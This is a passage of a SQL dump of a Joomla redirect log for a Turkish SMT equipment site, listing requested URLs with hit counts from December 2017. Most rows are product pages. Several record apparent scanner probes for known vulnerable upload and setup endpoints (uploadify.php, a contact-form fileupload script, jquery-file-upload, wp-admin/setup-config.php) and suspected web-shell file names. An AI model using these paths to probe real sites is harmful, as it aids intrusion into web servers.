00:00:00',301),(16550,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-22 17:11:52','0000-00-00 00:00:00',301),(16551,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/results,1-10',NULL,'','',4,0,'2017-12-22 17:22:47','0000-00-00 00:00:00',301),(16552,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,product_name/dirdesc/results,1-10',NULL,'','',3,0,'2017-12-22 17:33:42','0000-00-00 00:00:00',301),(16553,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,mf_name/results,1-50',NULL,'','',4,0,'2017-12-22 18:06:25','0000-00-00 00:00:00',301),(16554,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/dirdesc/results,1-20',NULL,'','',1,0,'2017-12-22 18:17:19','0000-00-00 00:00:00',301),(16555,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,mf_name/results,1-5',NULL,'','',14,0,'2017-12-22 19:11:52','0000-00-00 00:00:00',301),(16556,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,product_name/dirdesc/results,1-20',NULL,'','',1,0,'2017-12-22 19:22:47','0000-00-00 00:00:00',301),(16557,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2017-12-22 19:44:35','0000-00-00 00:00:00',301),(16558,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/dirdesc/results,1-50',NULL,'','',1,0,'2017-12-22 19:55:30','0000-00-00 00:00:00',301),(16559,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,category_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-22 20:39:08','0000-00-00 00:00:00',301),(16560,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/results,1-100',NULL,'','',1,0,'2017-12-22 21:22:46','0000-00-00 00:00:00',301),(16561,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,category_name/dirdesc/results,1-20',NULL,'','',3,0,'2017-12-22 22:06:24','0000-00-00 00:00:00',301),(16562,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/aqueous',NULL,'','',5,0,'2017-12-22 22:27:57','0000-00-00 00:00:00',301),(16563,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/results,1-20',NULL,'','',1,0,'2017-12-22 22:28:13','0000-00-00 00:00:00',301),(16564,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-22 22:50:04','0000-00-00 00:00:00',301),(16565,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,category_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-22 23:33:40','0000-00-00 00:00:00',301),(16566,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2017-12-22 23:44:38','0000-00-00 00:00:00',301),(16567,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,pc.ordering,product_name/dirdesc/results,1-5',NULL,'','',5,0,'2017-12-23 00:39:15','0000-00-00 00:00:00',301),(16568,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,mf_name/results,1-5',NULL,'','',1,0,'2017-12-23 00:50:02','0000-00-00 00:00:00',301),(16569,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2017-12-23 01:11:51','0000-00-00 00:00:00',301),(16570,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,mf_name/results,1-20',NULL,'','',1,0,'2017-12-23 02:06:24','0000-00-00 00:00:00',301),(16571,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/results,1-40',NULL,'','',1,0,'2017-12-23 03:00:57','0000-00-00 00:00:00',301),(16572,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,mf_name/results,1-10',NULL,'','',1,0,'2017-12-23 03:22:45','0000-00-00 00:00:00',301),(16573,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,pc.ordering,product_name/dirdesc/results,1-20',NULL,'','',1,0,'2017-12-23 04:06:23','0000-00-00 00:00:00',301),(16574,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/results,1-10',NULL,'','',4,0,'2017-12-23 04:50:05','0000-00-00 00:00:00',301),(16575,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,mf_name/results,1-50',NULL,'','',1,0,'2017-12-23 05:33:40','0000-00-00 00:00:00',301),(16576,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/results,1-20',NULL,'','',1,0,'2017-12-23 06:17:23','0000-00-00 00:00:00',301),(16577,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,ordering/results,1-50',NULL,'','',1,0,'2017-12-23 07:22:44','0000-00-00 00:00:00',301),(16578,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/results,1-100',NULL,'','',1,0,'2017-12-23 07:33:39','0000-00-00 00:00:00',301),(16579,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,ordering/results,1-5',NULL,'','',3,0,'2017-12-23 08:06:24','0000-00-00 00:00:00',301),(16580,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,category_name/dirdesc',NULL,'','',1,0,'2017-12-23 08:28:11','0000-00-00 00:00:00',301),(16581,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-23 09:00:56','0000-00-00 00:00:00',301),(16582,'http://3s-technologies.com.tr/tr/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'http://3s-technologies.com.tr/tr/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','',1,0,'2017-12-23 09:24:52','0000-00-00 00:00:00',301),(16583,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,ordering/results,1-20',NULL,'','',1,0,'2017-12-23 09:33:39','0000-00-00 00:00:00',301),(16584,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-23 10:26:56','0000-00-00 00:00:00',301),(16585,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,ordering/results,1-10',NULL,'','',1,0,'2017-12-23 10:37:13','0000-00-00 00:00:00',301),(16586,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,ordering/results,1-50',NULL,'','',1,0,'2017-12-23 11:28:40','0000-00-00 00:00:00',301),(16587,'http://3s-technologies.com.tr/en/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','',1,0,'2017-12-23 12:20:08','0000-00-00 00:00:00',301),(16588,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/k_solder-bar_3_250x250.png',NULL,'','',1,0,'2017-12-23 12:38:40','0000-00-00 00:00:00',301),(16589,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,ordering/results,1-20',NULL,'','',1,0,'2017-12-23 12:40:39','0000-00-00 00:00:00',301),(16590,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,`p`.product_sku',NULL,'','',1,0,'2017-12-23 13:42:21','0000-00-00 00:00:00',301),(16591,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,product_sku/results,1-5',NULL,'','',1,0,'2017-12-23 14:02:56','0000-00-00 00:00:00',301),(16592,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,product_name/results,1-5',NULL,'','',1,0,'2017-12-23 16:16:38','0000-00-00 00:00:00',301),(16593,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,product_sku/results,1-20',NULL,'','',1,0,'2017-12-23 17:08:04','0000-00-00 00:00:00',301),(16594,'http://www.3s-technologies.com.tr/tr/ueruenler/smd-ultra-hä±z',NULL,'','',1,0,'2017-12-23 20:45:20','0000-00-00 00:00:00',301),(16595,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,ordering/results,1-20',NULL,'','',1,0,'2017-12-23 21:14:55','0000-00-00 00:00:00',301),(16596,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,pc.ordering,product_name',NULL,'','',1,0,'2017-12-23 21:18:17','0000-00-00 00:00:00',301),(16597,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',184,0,'2017-12-23 21:35:29','0000-00-00 00:00:00',301),(16598,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/images/pdf/le_benchtop_automated_pick-place.pdf',NULL,'','',40,0,'2017-12-23 22:03:45','0000-00-00 00:00:00',301),(16599,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/dirdesc/results,1-10',NULL,'','',2,0,'2017-12-23 23:32:59','0000-00-00 00:00:00',301),(16600,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/dirdesc',NULL,'','',17,0,'2017-12-24 02:05:42','0000-00-00 00:00:00',301),(16601,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,mf_name/dirdesc',NULL,'','',7,0,'2017-12-24 04:27:30','0000-00-00 00:00:00',301),(16602,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,ordering/results,1-5',NULL,'','',1,0,'2017-12-24 05:11:08','0000-00-00 00:00:00',301),(16603,'http://www.3s-technologies.com.tr/tr/ueruenler/bã¶lgesel-lehimleme',NULL,'','',1,0,'2017-12-24 05:31:52','0000-00-00 00:00:00',301),(16604,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lehimleme-malzemeleri/tel-lehim',NULL,'','',6,0,'2017-12-24 08:11:18','0000-00-00 00:00:00',301),(16605,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',13,0,'2017-12-24 11:18:13','0000-00-00 00:00:00',301),(16606,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,product_sku/results,1-50',NULL,'','',1,0,'2017-12-24 12:53:40','0000-00-00 00:00:00',301),(16607,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc/results,1-40',NULL,'','',3,0,'2017-12-24 16:29:40','0000-00-00 00:00:00',301),(16608,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/form-lightbox/readme.txt',NULL,'','',1,0,'2017-12-24 16:50:29','0000-00-00 00:00:00',301),(16609,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/dirdesc/results,1-50',NULL,'','',1,0,'2017-12-24 17:23:39','0000-00-00 00:00:00',301),(16610,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-34-detail',NULL,'','',24,0,'2017-12-24 19:35:26','0000-00-00 00:00:00',301),(16611,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2017-12-24 19:42:57','0000-00-00 00:00:00',301),(16612,'http://3s-technologies.com.tr/tr/blog/wp-admin/setup-config.php',NULL,'','',7,0,'2017-12-24 19:59:58','0000-00-00 00:00:00',301),(16613,'http://3s-technologies.com.tr/tr/old/wp-admin/setup-config.php',NULL,'','',6,0,'2017-12-24 19:59:59','0000-00-00 00:00:00',301),(16614,'http://3s-technologies.com.tr/tr/wp/wp-admin/setup-config.php',NULL,'','',8,0,'2017-12-24 20:00:06','0000-00-00 00:00:00',301),(16615,'http://3s-technologies.com.tr/tr/wordpress/wp-admin/setup-config.php',NULL,'','',23,0,'2017-12-24 20:00:09','0000-00-00 00:00:00',301),(16616,'http://3s-technologies.com.tr/tr/test/wp-admin/setup-config.php',NULL,'','',4,0,'2017-12-24 20:00:10','0000-00-00 00:00:00',301),(16617,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,product_sku/results,1-20',NULL,'','',6,0,'2017-12-24 21:48:23','0000-00-00 00:00:00',301),(16618,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,product_sku/results,1-10',NULL,'','',1,0,'2017-12-24 22:35:20','0000-00-00 00:00:00',301),(16619,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering',NULL,'','',1,0,'2017-12-24 23:36:06','0000-00-00 00:00:00',301),(16620,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,ordering/results,1-20',NULL,'','',3,0,'2017-12-25 01:11:51','0000-00-00 00:00:00',301),(16621,'http://3s-technologies.com.tr/tr/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php',NULL,'http://3s-technologies.com.tr/tr/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php','',5,0,'2017-12-25 03:15:44','0000-00-00 00:00:00',301),(16622,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,product_name/results,1-50',NULL,'','',7,0,'2017-12-25 03:48:22','0000-00-00 00:00:00',301),(16623,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/avb-detail/askquestion?tmpl=component',NULL,'','',6,0,'2017-12-25 05:05:17','0000-00-00 00:00:00',301),(16624,'http://3s-technologies.com.tr/en/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php','',4,0,'2017-12-25 06:13:10','0000-00-00 00:00:00',301),(16625,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,product_name/results,1-20',NULL,'','',1,0,'2017-12-25 07:18:23','0000-00-00 00:00:00',301),(16626,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,product_name/results,1-10',NULL,'','',1,0,'2017-12-25 07:28:23','0000-00-00 00:00:00',301),(16627,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,`p`.product_sku/results,1-5',NULL,'','',3,0,'2017-12-25 07:38:37','0000-00-00 00:00:00',301),(16628,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,mf_name/results,1-50',NULL,'','',2,0,'2017-12-25 07:43:34','0000-00-00 00:00:00',301),(16629,'http://3s-technologies.com.tr/administrator/templates/khepri/index.php',NULL,'3s-technologies.com.tr','',11,0,'2017-12-25 07:48:59','0000-00-00 00:00:00',301),(16630,'http://3s-technologies.com.tr/modules/mod_j2module/mod_j2module.php',NULL,'3s-technologies.com.tr','',8,0,'2017-12-25 07:49:01','0000-00-00 00:00:00',301),(16631,'http://3s-technologies.com.tr/templates/jtemplate/j1template.php',NULL,'3s-technologies.com.tr','',9,0,'2017-12-25 07:50:10','0000-00-00 00:00:00',301),(16632,'http://3s-technologies.com.tr/templates/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',9,0,'2017-12-25 07:50:21','0000-00-00 00:00:00',301),(16633,'http://3s-technologies.com.tr/modules/mod_jmodule/mod_j1module.php',NULL,'3s-technologies.com.tr','',8,0,'2017-12-25 07:50:56','0000-00-00 00:00:00',301),(16634,'http://3s-technologies.com.tr/joomla/media/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',7,0,'2017-12-25 07:51:02','0000-00-00 00:00:00',301),(16635,'http://3s-technologies.com.tr/templates/jtemplate/jtemplate.php',NULL,'3s-technologies.com.tr','',9,0,'2017-12-25 07:51:31','0000-00-00 00:00:00',301),(16636,'http://3s-technologies.com.tr/templates/j2template/j2template.php',NULL,'3s-technologies.com.tr','',9,0,'2017-12-25 07:51:43','0000-00-00 00:00:00',301),(16637,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,`p`.product_sku/results,1-50',NULL,'','',6,0,'2017-12-25 07:53:43','0000-00-00 00:00:00',301),(16638,'http://3s-technologies.com.tr/templates/beez/index.php',NULL,'3s-technologies.com.tr','',11,0,'2017-12-25 07:53:45','0000-00-00 00:00:00',301),(16639,'http://3s-technologies.com.tr/tmp/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',8,0,'2017-12-25 07:55:56','0000-00-00 00:00:00',301),(16640,'http://3s-technologies.com.tr/images/jlogo.php',NULL,'3s-technologies.com.tr','',9,0,'2017-12-25 07:56:04','0000-00-00 00:00:00',301),(16641,'http://3s-technologies.com.tr/templates/rhuk_milkyway/index.php',NULL,'3s-technologies.com.tr','',11,0,'2017-12-25 08:00:25','0000-00-00 00:00:00',301),(16642,'http://3s-technologies.com.tr/templates/ja_purity/index.php',NULL,'3s-technologies.com.tr','',11,0,'2017-12-25 08:00:29','0000-00-00 00:00:00',301),(16643,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,`p`.product_sku/results,1-20',NULL,'','',5,0,'2017-12-25 08:08:44','0000-00-00 00:00:00',301),(16644,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,mf_name/results,1-10',NULL,'','',13,0,'2017-12-25 08:19:02','0000-00-00 00:00:00',301),(16645,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2017-12-25 08:44:31','0000-00-00 00:00:00',301),(16646,'http://www.3s-technologies.com.tr/en/wp-content/themes/rayoflight/functions/upload-handler.php',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/rayoflight/functions/upload-handler.php','',4,0,'2017-12-25 09:26:42','0000-00-00 00:00:00',301),(16647,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc/results,1-40',NULL,'','',1,0,'2017-12-25 10:21:14','0000-00-00 00:00:00',301),(16648,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,pc.ordering,product_name/results,1-5',NULL,'','',1,0,'2017-12-25 10:39:41','0000-00-00 00:00:00',301),(16649,'http://3s-technologies.com.tr/en/modules/mod_fxprev/mod_fxprev.xml',NULL,'','',15,0,'2017-12-25 10:49:26','0000-00-00 00:00:00',301),(16650,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc/results,1-20',NULL,'','',4,0,'2017-12-25 12:21:14','0000-00-00 00:00:00',301),(16651,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,mf_name/results,1-20',NULL,'','',1,0,'2017-12-25 12:30:27','0000-00-00 00:00:00',301),(16652,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc/results,1-40',NULL,'','',1,0,'2017-12-25 12:39:41','0000-00-00 00:00:00',301),(16653,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,pc.ordering,product_name/results,1-5',NULL,'','',1,0,'2017-12-25 12:48:55','0000-00-00 00:00:00',301),(16654,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,pc.ordering,product_name/results,1-10',NULL,'','',1,0,'2017-12-25 12:58:35','0000-00-00 00:00:00',301),(16655,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc/results,1-20',NULL,'','',2,0,'2017-12-25 14:02:46','0000-00-00 00:00:00',301),(16656,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/results,1-50',NULL,'','',5,0,'2017-12-25 14:30:27','0000-00-00 00:00:00',301),(16657,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,ordering/results,1-10',NULL,'','',5,0,'2017-12-25 14:48:55','0000-00-00 00:00:00',301),(16658,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,pc.ordering,product_name/results,1-50',NULL,'','',3,0,'2017-12-25 15:07:22','0000-00-00 00:00:00',301),(16659,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,category_name/results,1-20',NULL,'','',4,0,'2017-12-25 15:53:31','0000-00-00 00:00:00',301),(16660,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,product_sku/results,1-5',NULL,'','',1,0,'2017-12-25 16:21:13','0000-00-00 00:00:00',301),(16661,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,pc.ordering,product_name/results,1-20',NULL,'','',1,0,'2017-12-25 16:30:27','0000-00-00 00:00:00',301),(16662,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,category_name',NULL,'','',200,0,'2017-12-25 16:34:51','0000-00-00 00:00:00',301),(16663,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,category_name/results,1-10',NULL,'','',4,0,'2017-12-25 16:48:54','0000-00-00 00:00:00',301),(16664,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,`p`.product_sku?language=tr-tr',NULL,'','',9,0,'2017-12-25 17:29:15','0000-00-00 00:00:00',301),(16665,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,product_sku/results,1-50',NULL,'','',1,0,'2017-12-25 17:44:17','0000-00-00 00:00:00',301),(16666,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,ordering/results,1-10',NULL,'','',2,0,'2017-12-25 17:48:24','0000-00-00 00:00:00',301),(16667,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,product_sku/results,1-20',NULL,'','',1,0,'2017-12-25 19:52:44','0000-00-00 00:00:00',301),(16668,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,`p`.product_sku/dirdesc/results,1-50',NULL,'','',6,0,'2017-12-25 20:22:44','0000-00-00 00:00:00',301),(16669,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,product_sku/results,1-10',NULL,'','',1,0,'2017-12-25 21:02:44','0000-00-00 00:00:00',301),(16670,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&itemid=147&lang=en',NULL,'','',7,0,'2017-12-25 21:23:18','0000-00-00 00:00:00',301),(16671,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',2,0,'2017-12-25 21:52:44','0000-00-00 00:00:00',301),(16672,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,product_name/results,1-5',NULL,'','',1,0,'2017-12-25 22:22:44','0000-00-00 00:00:00',301),(16673,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,mf_name/results,1-20?language=en-gb',NULL,'','',1,0,'2017-12-25 23:02:44','0000-00-00 00:00:00',301),(16674,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,product_name/results,1-20',NULL,'','',2,0,'2017-12-26 00:52:44','0000-00-00 00:00:00',301),(16675,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,ordering/results,1-50?language=en-gb',NULL,'','',4,0,'2017-12-26 01:12:44','0000-00-00 00:00:00',301),(16676,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,category_name/results,1-5?language=en-gb',NULL,'','',1,0,'2017-12-26 02:52:43','0000-00-00 00:00:00',301),(16677,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,product_name/results,1-50',NULL,'','',1,0,'2017-12-26 03:52:43','0000-00-00 00:00:00',301),(16678,'http://3s-technologies.com.tr/tr/assets/global/plugins/jquery-file-upload/server/php/',NULL,'http://3s-technologies.com.tr/tr/assets/global/plugins/jquery-file-upload/server/php/','',3,0,'2017-12-26 04:16:24','0000-00-00 00:00:00',301),(16679,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,category_name/results,1-5',NULL,'','',4,0,'2017-12-26 05:22:43','0000-00-00 00:00:00',301),(16680,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,category_name/dirdesc/results,1-5',NULL,'','',5,0,'2017-12-26 06:34:34','0000-00-00 00:00:00',301),(16681,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,product_name/results,1-10',NULL,'','',1,0,'2017-12-26 07:18:10','0000-00-00 00:00:00',301),(16682,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/results,1-10',NULL,'','',3,0,'2017-12-26 07:29:04','0000-00-00 00:00:00',301),(16683,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',44,0,'2017-12-26 12:35:58','0000-00-00 00:00:00',301),(16684,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-orta-hızlı/by,mf_name',NULL,'','',2,0,'2017-12-26 14:34:31','0000-00-00 00:00:00',301),(16685,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-orta-hızlı/by,product_name',NULL,'','',5,0,'2017-12-26 15:29:03','0000-00-00 00:00:00',301),(16686,'http://www.3s-technologies.com.tr/tr/ueruenler/smd-fä±rä±n',NULL,'','',1,0,'2017-12-26 15:29:20','0000-00-00 00:00:00',301),(16687,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-26 16:34:34','0000-00-00 00:00:00',301),(16688,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc/results,1-100',NULL,'','',1,0,'2017-12-26 17:52:31','0000-00-00 00:00:00',301),(16689,'http://www.3s-technologies.com.tr/tr/ueruenler/smd-orta-hä±zlä±',NULL,'','',1,0,'2017-12-26 18:03:43','0000-00-00 00:00:00',301),(16690,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc/results,1-100',NULL,'','',1,0,'2017-12-26 19:18:36','0000-00-00 00:00:00',301),(16691,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,product_name/results,1-50',NULL,'','',1,0,'2017-12-26 20:05:33','0000-00-00 00:00:00',301),(16692,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',9,0,'2017-12-26 20:13:23','0000-00-00 00:00:00',301),(16693,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc/results,1-40',NULL,'','',1,0,'2017-12-26 21:00:20','0000-00-00 00:00:00',301),(16694,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,product_name/results,1-10',NULL,'','',9,0,'2017-12-26 21:31:38','0000-00-00 00:00:00',301),(16695,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-26 22:49:54','0000-00-00 00:00:00',301),(16696,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,ordering/results,1-5',NULL,'','',2,0,'2017-12-26 23:03:36','0000-00-00 00:00:00',301),(16697,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,category_name/results,1-10',NULL,'','',1,0,'2017-12-26 23:29:01','0000-00-00 